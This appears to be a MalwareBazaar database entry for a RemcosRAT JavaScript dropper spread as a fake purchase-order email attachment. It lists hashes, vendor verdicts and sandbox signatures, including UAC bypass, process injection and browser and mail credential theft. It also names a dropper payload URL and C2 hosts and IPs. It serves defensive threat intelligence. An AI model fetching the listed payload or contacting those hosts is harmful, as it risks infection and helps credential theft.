MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 11


Intelligence 11 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac
SHA3-384 hash: 7fe69e3293c875b0d168047acff5d43d54918a1e84d6248c194e6d47b6cc22be9518e64b8ed37a22cdc08b906fd875ea
SHA1 hash: e6eb7e7ec1c975511666704c689f95f1e5878e10
MD5 hash: 73143daf27d3dac83ed42785ab4f1993
humanhash: mirror-one-autumn-three
File name:Purchase order 4504033909.js
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:1'234'477 bytes
First seen:2025-12-01 06:52:35 UTC
Last seen:2025-12-01 14:37:09 UTC
File type:Java Script (JS) js
MIME type:text/plain
ssdeep 24:2xgNiLdz9pkHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHQ:rwrZ1NL
Threatray 1'893 similar samples on MalwareBazaar
TLSH T1DD4503449148B0384B776A03AF400D68AFB428291E4EC07D3D14E8D8CB7BAF861F9DF5
Magika javascript
Reporter lowmal3
Tags:js RemcosRAT

Intelligence

File Origin
# of uploads :
4
# of downloads :
100
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Score:
97.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=692d3b5cc908fdc69747393b
Tags:
ransomware xtreme shell
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm base64 fingerprint masquerade obfuscated obfuscated powershell repaired
Link:
https://www.filescan.io/uploads/692d3b59d0d5e7288b5251bb/reports/65e24ca3-ce6d-4546-af7c-a69b53dac3da/overview
Verdict:
Malicious
Labled as:
SVM:TrojanDownloader/JS.MalBehav.gen
Link:
https://www.hybrid-analysis.com/sample/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac
Verdict:
Malicious
File Type:
text
First seen:
2025-11-30T21:57:00Z UTC
Last seen:
2025-12-03T05:32:00Z UTC
Hits:
~10000
Detections:
HEUR:Trojan.Script.Generic Trojan-Downloader.JS.SLoad.sb Trojan.JS.SAgent.sb HEUR:Trojan-Downloader.Script.SLoad.gen HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.SAgent.gen
Link:
https://opentip.kaspersky.com/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac/results?tab=lookup
Result
Threat name:
Remcos
Create hunting rule
Detection:
malicious
Classification:
rans.phis.troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1823376
Signature
.NET source code contains potential unpacker
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to bypass UAC (CMSTPLUA)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates processes via WMI
Detected Remcos RAT
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Remcos
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected Generic JS Downloader
Yara detected MSILDownloaderGeneric
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected WebBrowserPassView password recovery tool
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1823376 Sample: Purchase order 4504033909.js Startdate: 01/12/2025 Architecture: WINDOWS Score: 100 52 pixeldrain.com 2->52 54 bvaco.com 2->54 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 21 other signatures 2->78 8 powershell.exe 14 16 2->8         started        12 wscript.exe 1 13 2->12         started        14 wscript.exe 12 2->14         started        signatures3 process4 dnsIp5 56 bvaco.com 119.18.49.46, 443, 49693, 49698 PUBLIC-DOMAIN-REGISTRYUS India 8->56 80 Writes to foreign memory regions 8->80 82 Injects a PE file into a foreign processes 8->82 84 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->84 16 cmd.exe 4 3 8->16         started        21 cmd.exe 2 8->21         started        23 conhost.exe 8->23         started        58 pixeldrain.com 160.202.167.164, 443, 49690, 49694 DEDICATEDUS New Zealand 12->58 86 System process connects to network (likely due to code injection or exploit) 12->86 88 Suspicious powershell command line found 12->88 90 Wscript starts Powershell (via cmd or directly) 12->90 92 3 other signatures 12->92 25 powershell.exe 14->25         started        signatures6 process7 dnsIp8 50 107.175.246.37, 2404, 49695, 49696 AS-COLOCROSSINGUS United States 16->50 42 C:\Users\user\AppData\Local\Temp\THD446.tmp, MS-DOS 16->42 dropped 44 C:\Users\user\AppData\Local\Temp\THD196.tmp, MS-DOS 16->44 dropped 46 C:\Users\user\AppData\Local\Temp\THD0E9.tmp, PE32 16->46 dropped 60 Contains functionality to bypass UAC (CMSTPLUA) 16->60 62 Detected Remcos RAT 16->62 64 Contains functionalty to change the wallpaper 16->64 70 7 other signatures 16->70 27 RmClient.exe 2 16->27         started        30 RmClient.exe 1 16->30         started        32 RmClient.exe 1 16->32         started        34 RmClient.exe 16->34         started        48 C:\Users\Public\Downloads48ame_File.js, ASCII 21->48 dropped 36 conhost.exe 21->36         started        66 Writes to foreign memory regions 25->66 68 Injects a PE file into a foreign processes 25->68 38 cmd.exe 25->38         started        40 conhost.exe 25->40         started        file9 signatures10 process11 signatures12 94 Tries to steal Mail credentials (via file registry) 27->94 96 Tries to harvest and steal browser information (history, passwords, etc) 27->96 98 Unusual module load detection (module proxying) 27->98 100 Tries to steal Instant Messenger accounts or passwords 30->100 102 Tries to steal Mail credentials (via file / registry access) 30->102 104 Detected Remcos RAT 38->104
Score:
1%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac
Verdict:
inconclusive
YARA:
1 match(es)
Link:
https://app.malva.re/file/73143daf27d3dac83ed42785ab4f1993
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac/
Verdict:
Malicious
Threat:
Trojan-Downloader.JS.SLoad
Link:
https://tip.neiki.dev/file/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac
Threat name:
Win32.Trojan.Egairtigado
Create hunting rule
Status:
Malicious
First seen:
2025-12-01 01:01:03 UTC
File Type:
Text (JavaScript)
AV detection:
9 of 24 (37.50%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=3ah4b5bw32rsjmmffazfdzw54d6ppfrknwuiv5ugom7osxabbswa._file
Verdict:
malicious
Label(s):
remcos
Create hunting rule
nirsoft
Create hunting rule
Similar samples:
1154c3527815ca9abc389ad84cf036d778fe9870c56265d03729752ce6e9a03d
RemcosRAT
1ce00aa5cb26d657ce7face5bbb2d9aa72f5e2a65e7bcfa966e4eb1a424e1a94
RemcosRAT
4718836be88f634ceaf1a70bf81b1efa2e589975c78c3d1436b3c8ee89d071ef
RemcosRAT
588f35133f3b40ab2b2388337f4350ef394133a743110b48b1a7a065c17ed40d
RemcosRAT
62da0e40b7ea9304ca48d767fd6ddd0ad1305489622edebde730d0ab942a1271
RemcosRAT
72ff12f79d821cc7afb3d3807d3bb4a4f1dfa9e4b712bbaffca97493f563b7c9
RemcosRAT
b54ff52b3729fd79f32b7ea4644a8d85380658ce987ac1eea45ca6f76cc6f8ab
RemcosRAT
error
RemcosRAT
+ 1'883 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  10/10
Tags:
execution
Link:
https://tria.ge/reports/251201-hnqhestpdt/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Command and Scripting Interpreter: JavaScript
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Process spawned unexpected child process
Malware Config
Dropper Extraction:
https://bvaco.com/js/panel/uploads/optimized_MSI.png
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

RemcosRAT

Java Script (JS) js d80fc0f436dea324b185283251e6dde0fcf7962a6da88af686733ee95c010cac

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments